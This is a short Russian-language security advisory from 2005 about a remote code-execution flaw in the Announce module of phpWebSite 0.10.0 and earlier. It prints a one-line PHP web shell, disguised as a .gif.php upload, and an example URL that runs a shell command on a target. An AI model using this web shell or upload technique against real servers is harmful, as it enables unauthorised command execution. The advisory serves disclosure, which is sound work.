Security Lab

php-инклюдинг в phpWebSite

Дата публикации:28.02.2005
Всего просмотров:894
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpWebSite 0.10.0 и более ранние версии

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на уязвимом сервере.

Уязвимость обнаружена в модуле Announce при обработке gif файлов. Удаленный пользователь с привилегиями на загрузку файлов и публикацию анонсов может выполнить произвольный php сценарий на сервере. Удаленный пользователь может выдать php сценарий за gif файл ([anyname].gif.php), содержащий следующие строки и выполнить произвольные команды на системе:

<?passthru($_GET[nst]);?>

Пример/Эксплоит:

http://[target]/images/announce/[anyname].gif.php?nst=ls –la

URL производителя: http://phpwebsite.appstate.edu

Решение: Способов устранения уязвимости не существует в настоящее время.